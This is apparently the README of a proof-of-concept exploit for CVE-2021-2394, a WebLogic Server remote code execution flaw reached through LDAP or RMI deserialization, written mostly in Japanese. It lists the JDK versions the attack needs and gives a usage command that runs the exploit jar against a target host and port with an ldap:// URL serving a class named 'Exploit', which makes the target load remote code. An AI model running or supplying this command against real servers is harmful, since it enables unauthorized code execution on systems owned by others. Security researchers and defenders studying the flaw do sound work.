
CVE-2021-2394の概念実証エクスプロイト。Oracle WebLogic Serverのリモートコード実行の脆弱性です。LDAPまたはRMIの逆シリアル化を使用してペイロードを配信します。
POC of CVE-2021-2394
注意事項
RMIベースの利用方法では、JDKバージョンは6u132、7u131、8u121より前である必要があります。8u122以降では、逆シリアル化のホワイトリスト機構が追加され、RMIによるリモートコードロードが無効になりました。 LDAPベースの利用方法では、JDKバージョンは6u211、7u201、8u191、11.0.1より前である必要があります。8u191では、OracleがLDAPベクターに制限を設定し、CVE-2018-3149を公開してJNDIリモートクラスロードを無効にしました。 From:https://www.freebuf.com/vuls/279465.html
使用方法:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit参考リンク:
更新
分析記事